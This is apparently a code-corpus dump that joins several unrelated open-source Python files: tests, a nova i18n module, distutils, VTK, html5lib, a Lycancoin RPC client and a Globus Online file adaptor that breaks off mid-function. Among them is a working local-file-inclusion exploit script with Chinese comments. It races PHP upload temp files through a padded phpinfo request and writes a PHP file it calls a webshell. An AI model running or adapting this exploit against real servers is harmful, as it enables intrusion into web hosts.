conf['IPV6TO4_ROUTING'] = "blah \tblah"
contents2 = str(conf).strip()
# Should be requoted due to whitespace
self.assertRegMatches(contents2,
r'IPV6TO4_ROUTING=[\']blah\s+blah[\']')
def test_parse_no_adjust_shell(self):
conf = SysConf(''.splitlines())
conf['B'] = ' $(time)'
contents = str(conf)
self.assertEquals('B= $(time)', contents)
def test_parse_empty(self):
contents = ''
conf = SysConf(contents.splitlines())
self.assertEquals('', str(conf).strip())
def test_parse_add_new(self):
contents = 'BLAH=b'
conf = SysConf(contents.splitlines())
conf['Z'] = 'd'
contents = str(conf)
self.assertIn("Z=d", contents)
self.assertIn("BLAH=b", contents)
|
cloudbase/nova
|
refs/heads/master
|
nova/i18n.py
|
86
|
# Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""oslo.i18n integration module.
See http://docs.openstack.org/developer/oslo.i18n/usage.html .
"""
import oslo_i18n
DOMAIN = 'nova'
_translators = oslo_i18n.TranslatorFactory(domain=DOMAIN)
# The primary translation function using the well-known name "_"
_ = _translators.primary
# Translators for log levels.
#
# The abbreviated names are meant to reflect the usual use of a short
# name like '_'. The "L" is for "log" and the other letter comes from
# the level.
_LI = _translators.log_info
_LW = _translators.log_warning
_LE = _translators.log_error
_LC = _translators.log_critical
def translate(value, user_locale):
return oslo_i18n.translate(value, user_locale)
def get_available_languages():
return oslo_i18n.get_available_languages(DOMAIN)
|
barbarubra/Don-t-know-What-i-m-doing.
|
refs/heads/master
|
python/src/Lib/distutils/command/install_headers.py
|
53
|
"""distutils.command.install_headers
Implements the Distutils 'install_headers' command, to install C/C++ header
files to the Python include directory."""
# This module should be kept compatible with Python 2.1.
__revision__ = "$Id: install_headers.py 61000 2008-02-23 17:40:11Z christian.heimes $"
from distutils.core import Command
class install_headers (Command):
description = "install C/C++ header files"
user_options = [('install-dir=', 'd',
"directory to install header files to"),
('force', 'f',
"force installation (overwrite existing files)"),
]
boolean_options = ['force']
def initialize_options (self):
self.install_dir = None
self.force = 0
self.outfiles = []
def finalize_options (self):
self.set_undefined_options('install',
('install_headers', 'install_dir'),
('force', 'force'))
def run (self):
headers = self.distribution.headers
if not headers:
return
self.mkpath(self.install_dir)
for header in headers:
(out, _) = self.copy_file(header, self.install_dir)
self.outfiles.append(out)
def get_inputs (self):
return self.distribution.headers or []
def get_outputs (self):
return self.outfiles
# class install_headers
|
demarle/VTK
|
refs/heads/master
|
Filters/General/Testing/Python/WarpToImage.py
|
20
|
#!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# create a rendering window
renWin = vtk.vtkRenderWindow()
renWin.SetMultiSamples(0)
renWin.SetSize(200,200)
wavelet = vtk.vtkRTAnalyticSource()
wavelet.SetWholeExtent(-100,100,-100,100,0,0)
wavelet.SetCenter(0,0,0)
wavelet.SetMaximum(255)
wavelet.SetStandardDeviation(.5)
wavelet.SetXFreq(60)
wavelet.SetYFreq(30)
wavelet.SetZFreq(40)
wavelet.SetXMag(10)
wavelet.SetYMag(18)
wavelet.SetZMag(5)
wavelet.SetSubsampleRate(1)
warp = vtk.vtkWarpTo()
warp.SetInputConnection(wavelet.GetOutputPort())
warp.SetScaleFactor(0)
warp.SetPosition(0,0,0)
mapper = vtk.vtkDataSetMapper()
mapper.SetInputConnection(warp.GetOutputPort())
mapper.SetScalarRange(75,290)
actor = vtk.vtkActor()
actor.SetMapper(mapper)
renderer = vtk.vtkRenderer()
renderer.AddActor(actor)
renderer.ResetCamera()
renWin.AddRenderer(renderer)
warp.SetScaleFactor(0.25)
warp.SetPosition(75,75,0)
warp.Update()
# --- end of script --
|
zstyblik/infernal-twin
|
refs/heads/master
|
build/pip/build/lib.linux-i686-2.7/pip/_vendor/html5lib/treeadapters/sax.py
|
1835
|
from __future__ import absolute_import, division, unicode_literals
from xml.sax.xmlreader import AttributesNSImpl
from ..constants import adjustForeignAttributes, unadjustForeignAttributes
prefix_mapping = {}
for prefix, localName, namespace in adjustForeignAttributes.values():
if prefix is not None:
prefix_mapping[prefix] = namespace
def to_sax(walker, handler):
"""Call SAX-like content handler based on treewalker walker"""
handler.startDocument()
for prefix, namespace in prefix_mapping.items():
handler.startPrefixMapping(prefix, namespace)
for token in walker:
type = token["type"]
if type == "Doctype":
continue
elif type in ("StartTag", "EmptyTag"):
attrs = AttributesNSImpl(token["data"],
unadjustForeignAttributes)
handler.startElementNS((token["namespace"], token["name"]),
token["name"],
attrs)
if type == "EmptyTag":
handler.endElementNS((token["namespace"], token["name"]),
token["name"])
elif type == "EndTag":
handler.endElementNS((token["namespace"], token["name"]),
token["name"])
elif type in ("Characters", "SpaceCharacters"):
handler.characters(token["data"])
elif type == "Comment":
pass
else:
assert False, "Unknown token type"
for prefix, namespace in prefix_mapping.items():
handler.endPrefixMapping(prefix)
handler.endDocument()
|
lycancoin/lycancoin-release
|
refs/heads/master
|
contrib/bitrpc/bitrpc.py
|
2
|
from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:8332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:8332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Lycancoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Lycancoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
|
hackersql/sq1map
|
refs/heads/master
|
Web/信息收集/pentest_tools/漏洞利用/web漏洞/lfi/lfi_tmp.py
|
1
|
#!/usr/bin/env python
# encoding=utf-8
# Author : idwar
# http://secer.org
'''
可能需要你改的几个地方:
1、host
2、port
3、request中的phpinfo页面名字及路径
4、hello_lfi() 函数中的url,即存在lfi的页面和参数
5、如果不成功或报错,尝试增加padding长度到7000、8000试试
6、某些开了magic_quotes_gpc或者其他东西不能%00的,自行想办法截断并在(4)的位置对应修改
Good Luck :)
7、payload的./指的是当前脚本的目录下,所以要注意最后输出的结果
'''
import re
import urllib2
import hashlib
from socket import *
from time import sleep
host = '192.168.227.133'
#host = gethostbyname(domain)
port = 80
shell_name = hashlib.md5(host).hexdigest() + '.php'
pattern = re.compile(r'''\[tmp_name\]\s=>\s(.*)\W*error]''')
payload = '''idwar<?php fputs(fopen('./''' + shell_name + '''\',"w"),"<?php phpinfo();?>")?>\r'''
req = '''-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r''' % payload
padding='A' * 8000
phpinfo_req ='''POST /phpinfo.php?a='''+padding+''' HTTP/1.0\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie='''+padding+'''\r
HTTP_ACCEPT: ''' + padding + '''\r
HTTP_USER_AGENT: ''' + padding + '''\r
HTTP_ACCEPT_LANGUAGE: ''' + padding + '''\r
HTTP_PRAGMA: ''' + padding + '''\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s''' % (len(req), host, req)
def hello_lfi():
while 1:
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(phpinfo_req)
data = ''
while r'</body></html>' not in data:
data = s.recv(9999)
search_ = re.search(pattern, data)
if search_:
tmp_file_name = search_.group(1)
url = r'http://192.168.227.133/lfi/ex1.php?f=%s' % tmp_file_name
print url
search_request = urllib2.Request(url)
search_response = urllib2.urlopen(search_request)
html_data = search_response.read()
if 'idwar' in html_data:
s.close()
return '\nDone. Your webshell is : \n\n%s\n' % ('http://' + host + '/' + shell_name)
#import sys;sys.exit()
s.close()
if __name__ == '__main__':
print hello_lfi()
print '\n Good Luck :)'
|
anisyonk/pilot
|
refs/heads/master
|
saga/adaptors/globus_online/go_file.py
|
4
|
__author__ = "Andre Merzky, Ole Weidner, Alexander Grill"
__copyright__ = "Copyright 2012-2013, The SAGA Project"
__license__ = "MIT"
""" shell based file adaptor implementation """
import radical.utils as ru
import saga.utils.pty_shell as sups
import saga.utils.misc as sumisc
import saga.adaptors.base
import saga.adaptors.cpi.filesystem
from saga.filesystem.constants import *
import re
import os
import sys
import time
import pprint
SYNC_CALL = saga.adaptors.cpi.decorators.SYNC_CALL
ASYNC_CALL = saga.adaptors.cpi.decorators.ASYNC_CALL
GO_DEFAULT_URL = "gsissh://cli.globusonline.org/"
# --------------------------------------------------------------------
# the adaptor name
#
_ADAPTOR_NAME = "saga.adaptor.globus_online_file"
_ADAPTOR_SCHEMAS = ["go+gsisftp", "go+gridftp"]
_ADAPTOR_OPTIONS = [
{
# fuck our config system! I don't want these to be strings! And its not
# even using isinstance! :/
'category' : 'saga.adaptor.globus_online_file',
'name' : 'enable_notifications',
'type' : str,
'default' : 'None',
'valid_options' : ['True', 'False', 'None'],
'documentation' : '''Enable email notifications for all file transfers.
Note that 'True' and 'False' will result in
permanent changes to your GO notification settings.
'None' will leave your profile's settings upchanged.''',
'env_variable' : None
},
{
# fuck our config system! I don't want these to be strings! And its not
# even using isinstance! :/
'category' : 'saga.adaptor.globus_online_file',
'name' : 'failure_mode',
'type' : str,
'default' : 'report',
'valid_options' : ['raise', 'report', 'ignore'],
'documentation' : '''Globus-Online seems to behave eratically. This flag
defines how the adaptor should deal with intermittent
and fatal) errors. 'raise' will cause exceptions on
all errors, 'report' will print error messages, but
otherwise continue, and 'ignore' will (duh!) ignore
errors. 'report' is the default, you should only use
'ignore' when you know what you are doing!''',
'env_variable' : None
}
]
# --------------------------------------------------------------------
# the adaptor capabilities & supported attributes
#
_ADAPTOR_CAPABILITIES = {
"metrics" : [],
"contexts" : {"x509" : "X509 proxy for Globus",
"userpass" : "username/password pair for GlobusOnline"}
}
# --------------------------------------------------------------------
# the adaptor documentation
#
_ADAPTOR_DOC = {
"name" : _ADAPTOR_NAME,
"cfg_options" : _ADAPTOR_OPTIONS,
"capabilities" : _ADAPTOR_CAPABILITIES,
"description" : """
The globusonline file adaptor. This adaptor uses the GO file transfer
service (https://www.globus.org/).
""",
"details" : """
""",
"schemas" : {"go+gsisftp" : "use globus online for gsisftp file transfer",
"go+gridftp" : "use globus online for gridftp file transfer"
}
}
# --------------------------------------------------------------------
# the adaptor info is used to register the adaptor with SAGA
_ADAPTOR_INFO = {
"name" : _ADAPTOR_NAME,
"version" : "v0.1",
"schemas" : _ADAPTOR_SCHEMAS,
"cpis" : [
{
"type" : "saga.namespace.Directory",
"class" : "GODirectory"
},
{
"type" : "saga.namespace.Entry",
"class" : "GOFile"
},
{
"type" : "saga.filesystem.Directory",
"class" : "GODirectory"
},
{
"type" : "saga.filesystem.File",
"class" : "GOFile"
}
]
}
################################################################################
# The adaptor class
class Adaptor (saga.adaptors.base.Base):
"""
This is the actual adaptor class, which gets loaded by SAGA (i.e. by the
SAGA engine), and which registers the CPI implementation classes which
provide the adaptor's functionality.
"""
# --------------------------------------------------------------------------
#
def __init__ (self) :
saga.adaptors.base.Base.__init__ (self, _ADAPTOR_INFO, _ADAPTOR_OPTIONS)
self.opts = self.get_config (_ADAPTOR_NAME)
self.notify = self.opts['enable_notifications'].get_value ()
self.f_mode = self.opts['failure_mode'].get_value ()
self.shells = dict () # keep go shells for each session
# --------------------------------------------------------------------------
#
def sanity_check (self) :
pass
# --------------------------------------------------------------------------
#
def get_go_shell (self, session, go_url=None) :
# this basically return a pty shell for
#
# gsissh [email protected]
#
# X509 contexts are prefered, but ssh contexts, userpass and myproxy can
# also be used. If the given url has username / password encoded, we
# create an userpass context out of it and add it to the (copy of) the
# session.
sid = session._id
if not sid in self.shells :
self.shells[sid] = dict ()
if not go_url :
new_url = saga.Url (GO_DEFAULT_URL)
else :
new_url = saga.Url (go_url) # deep copy
# create the shell.
shell = sups.PTYShell (new_url, session, self._logger, posix=False)
self.shells[sid]['shell'] = shell
# confirm the user ID for this shell
self.shells[sid]['user'] = None
_, out, _ = shell.run_sync ('profile')
for line in out.split ('\n') :
if 'User Name:' in line :
self.shells[sid]['user'] = line.split (':', 2)[1].strip ()
self._logger.debug ("using account '%s'" % self.shells[sid]['user'])
break
if not self.shells[sid]['user'] :
raise saga.NoSuccess ("Could not confirm user id")
if self.notify != 'None' :
if self.notify == 'True' :
self._logger.debug ("disable email notifications")
shell.run_sync ('profile -n on')
else :
self._logger.debug ("enable email notifications")
shell.run_sync ('profile -n off')
# for this fresh shell, we get the list of public endpoints. That list
# will contain the set of hosts we can potentially connect to.
self.get_go_endpoint_list (session, shell, fetch=True)
# pprint.pprint (self.shells)
# we have the shell for sure by now -- return it!
return self.shells[session._id]['shell']
# ----------------------------------------------------------------
#
def get_go_endpoint_ids (self, session, url) :
sid = session._id
if not sid in self.shells :
raise saga.InocrrectState ("GO shell disconnected")
schemas = [x for x in url.schema.split ('+') if x != 'go']
ep_str = "%s_%s" % ("_".join (schemas), url.host)
ep_name = "%s#%s" % (self.shells[sid]['user'], ep_str)
ep_url = saga.Url ()
ep_url.schema = "+".join (schemas)
ep_url.host = url.host
ep_url.port = url.port
return ep_str, ep_name, ep_url
# ----------------------------------------------------------------
#
def get_path_spec (self, session, url, path=None, cwd_url=None, cwd_path=None) :
# we assume that, whenever we request a path spec, we also want to use
# it, and we thus register and activate the endpoint, if needed.
sid = session._id
if not sid in self.shells :
raise saga.InocrrectState ("GO shell disconnected")
shell = self.shells[sid]['shell']
url = saga.Url (url)
if not path :
path = url.path
if not cwd_url :
cwd_url = saga.Url (url)
if not cwd_path :
cwd_path = '.'
else :
if not cwd_path :
cwd_path = cwd_url.path
if not url.host : url.host = cwd_url.host
if not url.schema : url.schema = cwd_url.schema
if not url.host : raise saga.BadParameter ('need host for GO ops')
if not url.schema : raise saga.BadParameter ('need schema for GO ops')
ep_str, ep_name, ep_url = self.get_go_endpoint_ids (session, url)
# if both URLs point into the same namespace, and if the given path is
# not absolute, then expand it relative to the cwd_path (if it exists).
# Otherwise it is left to the unmodified path.
ps_path = path
if sumisc.url_is_compatible (cwd_url, url) :
if not path.startswith ('/') :
if cwd_path :
ps_path = "%s/%s" % (cwd_path, path)
# the pathspec is the concatenation of ps_host and ps_path by a colon
ps = "%s:%s" % (ep_str, ps_path)
# check if we know the endpoint in ep_str, and create/activate as needed
ep = self.get_go_endpoint (session, shell, ep_url)
return ps
# ----------------------------------------------------------------
#
def get_go_endpoint (self, session, shell, url) :
# for the given URL, derive the endpoint string.
# FIXME: make sure that the endpoint is activated
ep_str, ep_name, ep_url = self.get_go_endpoint_ids (session, url)
ep = self.get_go_endpoint_list (session, shell, ep_name, fetch=False)
if not ep :
# if not, check if it was created meanwhile (fetch again)
ep = self.get_go_endpoint_list (session, shell, ep_name, fetch=True)
if not ep :
# if not, create it, activate it, and refresh all entries
shell.run_sync ("endpoint-add %s -p %s" % (ep_name, ep_url))
# refresh endpoint entries again
ep = self.get_go_endpoint_list (session, shell, ep_name, fetch=True)
if not ep :
# something above must have failed ...
raise saga.NoSuccess ("endpoint initialization failed")
# we have the endpoint now, for sure -- make sure its activated
if not ep['Credential Status'] == 'ACTIVE' :
shell.run_sync ("endpoint-activate -g %s" % ep_name)
# reload list to check status
ep = self.get_go_endpoint_list (session, shell, ep_name, fetch=True)
if not ep['Credential Status'] == 'ACTIVE' :
raise saga.AuthorizationFailed ("endpoint activation failed")
return ep
# ----------------------------------------------------------------
#
def get_go_endpoint_list (self, session, shell, ep_name=None, fetch=False) :
# if fecth is True, query the shell for an updated endpoint list.
# then check if the given ep_name is a known endpoint name, and if so,
# return that entry -- otherwise return None. If no ep_name is given,
# and fetch is True, we thus simply refresh the internal list.
self._logger.debug ("updating endpoint list (%s, %s)" % (ep_name, fetch))
if fetch :
endpoints = dict ()
name = None
_, out, _ = shell.run_sync ("endpoint-list -v")
for line in out.split ('\n') :
elems = line.split (':', 1)
if len(elems) != 2 :
continue
key = elems[0].strip ()
val = elems[1].strip ()
if not key or not val :
continue
if key == "Name" :
# we now operate on a new entry -- initialize it
name = val
endpoints[name] = dict()
# we make sure that some entries always exist, to simplify error
# checks
endpoints[name]['Name'] = name
endpoints[name]['Credential Status'] = None
endpoints[name]['Host(s)'] = None
else :
if name :
endpoints[name][key] = val
# replace the ep info dist with the new one, to clean out old entries.
self.shells[session._id]['endpoints'] = endpoints
if ep_name :
# return the requested entry, or None
return self.shells[session._id]['endpoints'].get (ep_name, None)
# ----------------------------------------------------------------
#
def run_go_cmd (self, shell, cmd, mode=None) :
# available modes:
# raise : raise NoSuccess on error
# report: print error message, but continue
# ignore: do nothing
if not mode :
mode = self.f_mode
_, out, err = shell.run_sync (cmd)
# see if the second line starts with 'Error'. Note that this assumes
# that the command only is one line...
lines = out.split ('\n')
if len(lines) > 1 :
if lines[1].startswith ('Error:') :
err = "%s\n%s" % (err, '\n'.join (lines))
out = None
else :
# on success, we always remove the first line, as that is not
# part of the output, really (this shell does not support
# 'stty -echo'...
out = '\n'.join (lines[1:])
if err :
if mode == 'raise' :
# FIXME: a 'translate_exception' call would be useful here...
raise saga.NoSuccess ("Error in '%s': %s" % (cmd, err))
if mode == 'report' :
self._logger.error ("Error in '%s': %s" % (cmd, err))
if mode == 'silent' :
pass
return out, err
# ----------------------------------------------------------------
#
def mkparents (self, session, shell, tgt_ps) :
# GO does not support mkdir -p, so we need to split the dir into
# elements and create one after the other, ignoring errors for already
# existing elements.
host_ps, path_ps = tgt_ps.split (':', 1)
self._logger.info ('mkparents %s' % path_ps)
if path_ps.startswith ('/') : cur_path = ''
else : cur_path = '.'
error = dict()
path_elems = filter (None, path_ps.split ('/'))
for path_elem in path_elems :
cur_path = "%s/%s" % (cur_path, path_elem)
out, err = self.run_go_cmd (shell, "mkdir %s:%s" % (host_ps, cur_path))
if err :
error[cur_path] = err
if len(error) :
# some mkdir gave an error. Check if the error occured on the last
# dir (the tgt), and if that is not a ignorable report that it
# already exists -- anything else will raise an exception though...
if cur_path in error :
if not 'Path already exists' in error[cur_path] :
if self.f_mode == 'raise' :
# FIXME: a 'translate_exception' call would be useful here...
raise saga.NoSuccess ("Could not make dir hierarchy: %s" % str(error))
if self.f_mode == 'report' :
self._logger.error ("Could not make dir hierarchy: %s" % str(error))
if self.f_mode == 'silent' :
pass
################################################################################
#
class GODirectory (saga.adaptors.cpi.filesystem.Directory) :
""" Implements saga.adaptors.cpi.filesystem.Directory """
# ----------------------------------------------------------------
#
def __init__ (self, api, adaptor) :
_cpi_base = super (GODirectory, self)
_cpi_base.__init__ (api, adaptor)
# ----------------------------------------------------------------
#
def _is_valid (self) :
if not self.valid :
raise saga.IncorrectState ("this instance was closed or removed")
# ----------------------------------------------------------------
#
@SYNC_CALL
def init_instance (self, adaptor_state, url, flags, session) :
""" Directory instance constructor """
# FIXME: eval flags!
if flags == None :
flags = 0
self.orig = saga.Url (url) # deep copy
self.url = saga.Url (url) # deep copy
self.path = url.path # keep path separate
self.url.path = None
self.flags = flags
self.session = session
self.valid = False # will be set by initialize
self.initialize ()
return self.get_api ()
# ----------------------------------------------------------------
#
def initialize (self) :
# GO shell got started, found its prompt. Now, change
# to the initial (or later current) working directory.
self.shell = self._adaptor.get_go_shell (self.session)
self.ep = self._adaptor.get_go_endpoint (self.session, self.shell, self.url)
self.ep_str, self.ep_name, self.ep_url = \
self._adaptor.get_go_endpoint_ids (self.session, self.url)
ps = self.get_path_spec ()
if not self.ep :
raise saga.badparameter ("invalid dir '%s': %s" % (ps, out))
if self.flags & saga.filesystem.CREATE_PARENTS :
self._adaptor.mkparents (self.session, self.shell, ps)
elif self.flags & saga.filesystem.CREATE :
self._adaptor.run_go_cmd (self.shell, "mkdir '%s'" % ps)
else :
# this is as good an existence test as we can manage...
self._adaptor.run_go_cmd (self.shell, "ls '%s'" % ps)
self._logger.debug ("initialized directory %s/%s" % (self.url, self.path))
self.valid = True
# ----------------------------------------------------------------
#
def finalize (self, kill=False) :
if kill and self.shell :
self.shell.finalize (True)
self.shell = None
self.valid = False
# ----------------------------------------------------------------
#
def get_path_spec (self, url=None, path=None) :
return self._adaptor.get_path_spec (session = self.session,
url = url,
path = path,
cwd_url = self.url,
cwd_path = self.path)
# ----------------------------------------------------------------
#
@SYNC_CALL
def open (self, url, flags) :
self._is_valid ()
adaptor_state = { "from_open" : True,
"url" : saga.Url (self.url), # deep copy
"path" : self.path}
if sumisc.url_is_relative (url) :
url = sumisc.url_make_absolute (self.get_url (), url)
return saga.filesystem.File (url=url, flags=flags, session=self.session,
_adaptor=self._adaptor, _adaptor_state=adaptor_state)
# ----------------------------------------------------------------
#
@SYNC_CALL
def open_dir (self, url, flags) :
self._is_valid ()
adaptor_state = { "from_open" : True,
"url" : saga.Url (self.url), # deep copy
"path" : self.path}
if sumisc.url_is_relative (url) :
url = sumisc.url_make_absolute (self.get_url (), url)
return saga.filesystem.Directory (url=url, flags=flags, session=self.session,
_adaptor=self._adaptor, _adaptor_state=adaptor_state)
# ----------------------------------------------------------------
#
@SYNC_CALL
def change_dir (self, tgt, flags) :
tgt_url = saga.Url (tgt)
# FIXME: attempt to get new EP
if not sumisc.url_is_compatible (self.url, tgt_url) :
raise saga.BadParameter ("target dir outside of namespace '%s': %s" \
% (self.url, tgt_url))
if sumisc.url_is_relative (tgt_url) :
self.path = tgt_url.path
self.orig.path = self.path
else :
self.orig = saga.Url (tgt_url)
self.url = tgt_url
self.path = self.url.path
self.url.path = None
self.initialize ()
self._logger.debug ("changed directory (%s)" % (tgt))
# ----------------------------------------------------------------
#
@SYNC_CALL
def close (self, timeout=None):
if timeout :
raise saga.BadParameter ("timeout for close not supported")
self.finalize (kill=True)
# ----------------------------------------------------------------
@SYNC_CALL
def get_url (self) :
self._is_valid ()
return saga.Url (self.orig) # deep copy
# ----------------------------------------------------------------
#
@SYNC_CALL
def list (self, npat, flags):
self._is_valid ()
npat_ps = self.get_path_spec (url=npat)
out, err = self._adaptor.run_go_cmd (self.shell, "ls '%s'" % (npat_ps))
lines = filter (None, out.split ("\n"))
self._logger.debug (lines)
self.entries = []
for line in lines :
self.entries.append (saga.Url (line.strip ()))
return self.entries
# ----------------------------------------------------------------
#
@SYNC_CALL
def copy_self (self, tgt, flags):
self._is_valid ()
return self.copy (src_in=None, tgt_in=tgt, flags=flags)
# ----------------------------------------------------------------
#
@SYNC_CALL
def copy (self, src_in, tgt_in, flags, _from_task=None):
self._is_valid ()
# FIXME: eval flags
src_ps = self.get_path_spec (url=src_in)
tgt_ps = self.get_path_spec (url=tgt_in)
cmd_flags = ""
if flags & saga.filesystem.RECURSIVE :
cmd_flags += "-r"
if flags & saga.filesystem.CREATE_PARENTS :
self._adaptor.mkparents (self.session, self.shell, tgt_ps)
cmd = "scp %s -s 0 '%s' '%s'" % (cmd_flags, src_ps, tgt_ps)
out, err = self._adaptor.run_go_cmd (self.shell, cmd)
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def link_self (self, tgt, flags):
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def link (self, src_in, tgt_in, flags, _from_task=None):
#
# self._is_valid ()
#
# ----------------------------------------------------------------
#
@SYNC_CALL
def move_self (self, tgt, flags):
return self.move (src_in=None, tgt_in=tgt, flags=flags)
# ----------------------------------------------------------------
#
@SYNC_CALL
def move (self, src_in, tgt_in, flags):
# if src and target are on the same endpoint, we might get away with an
